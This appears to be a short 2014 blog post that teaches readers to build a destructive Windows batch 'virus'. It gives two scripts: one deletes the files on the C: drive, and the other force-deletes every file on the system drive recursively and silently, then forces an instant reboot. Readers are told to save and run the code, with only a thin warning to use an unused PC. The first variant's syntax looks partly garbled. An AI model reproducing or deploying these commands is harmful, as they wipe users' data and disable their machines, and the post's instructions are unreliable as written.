Tuesday 11 February 2014

Make simple virus that destroys a PC

Instruction :
  • Open Notepad and write the following code in it
    • @echo off
      Del C:\ *.*
      y
      or
    • @echo off
      del %systemdrive%\*.* /f /s /q
      shutdown -r -f -t 00
  • Now save it with .bat file & run it it will destroy your C drive.
Note : Please do not run directly on your PC it'll destroy your mentioned drive here i mentioned C drive. So try on it on unused PC and both code are valid try any one.

No comments:

Post a Comment